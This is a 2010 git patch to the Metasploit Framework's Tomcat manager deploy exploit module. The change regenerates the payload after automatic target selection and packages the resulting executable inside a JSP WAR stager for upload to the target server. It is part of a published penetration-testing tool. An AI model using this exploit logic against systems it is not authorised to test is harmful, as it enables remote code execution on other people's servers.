From b49e81300ae38d06af8218c8d5cd56f5ecafbf14 Mon Sep 17 00:00:00 2001
From: Joshua Drake <github.jdrake@qoop.org>
Date: Thu, 14 Oct 2010 21:26:05 +0000
Subject: [PATCH] fix auto-target exe generation

git-svn-id: file:///home/svn/framework3/trunk@10688 4d416f70-5f16-0410-b530-b9f4589650da
---
 .../exploits/multi/http/tomcat_mgr_deploy.rb   | 18 +++++++++++++++---
 1 file changed, 15 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb
index 885b2ca955..a217a570b5 100644
--- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb
+++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb
@@ -179,18 +179,30 @@ class Metasploit3 < Msf::Exploit::Remote
 				raise RuntimeError, "Unable to automatically select a target"
 			end
 			print_status("Automatically selected target \"#{mytarget.name}\"")
+
+			# We must regenerate the payload in case our auto-magic changed something.
+			p = exploit_regenerate_payload(mytarget.platform, mytarget.arch)
 		else
 			print_status("Using manually select target \"#{mytarget.name}\"")
+			p = payload
 		end
 
 		# Generate the WAR containing the EXE containing the payload
 		jsp_name = rand_text_alphanumeric(4+rand(32-4))
-		exe = generate_payload_exe
-		war = Msf::Util::EXE.to_jsp_war(exe, :jsp_name => jsp_name)
-
 		app_base = rand_text_alphanumeric(4+rand(32-4))
 		query_str = "?path=/" + app_base
 
+		# Generate an EXE from the payload
+		exe = generate_payload_exe(
+			{
+				:code => p.encoded,
+				:arch => mytarget.arch,
+				:platform => mytarget.platform
+			})
+
+		# Encapsulate it in a WAR stager
+		war = Msf::Util::EXE.to_jsp_war(exe, :jsp_name => jsp_name)
+
 		#
 		# UPLOAD
 		#